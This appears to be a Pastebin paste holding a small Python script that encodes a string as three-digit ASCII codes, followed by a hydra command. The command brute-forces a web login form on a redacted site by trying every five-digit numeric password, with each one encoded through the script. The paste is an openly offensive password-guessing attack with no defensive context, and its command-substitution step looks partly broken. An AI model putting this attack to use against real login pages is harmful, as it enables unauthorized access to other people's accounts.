Guest User

Untitled

a guest
Dec 16th, 2017
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. #!/usr/bin/python
  2. import sys
  3.  
  4. ## input ##
  5. args = sys.argv
  6. s = args[1]
  7. #print(s)
  8.  
  9. ## ascii ##
  10. ascii = []
  11. for c in s:
  12. j = str(ord(c))
  13. if len(j) == 2: j = '0' + j
  14. elif len(j) == 1: j = '00' + j
  15. ascii.append(j)
  16. for v in ascii: print(v, end="")
  17.  
  18. hydra -l "username" -x 5:5:1 -o found.txt xxxxxxx.com http-post-form "/xxxxxxx.php:username=^USER^&pass=^PASS^&password=$(python3 ascii.py $PASS):Hib" -V -I
Add Comment
Please, Sign In to add comment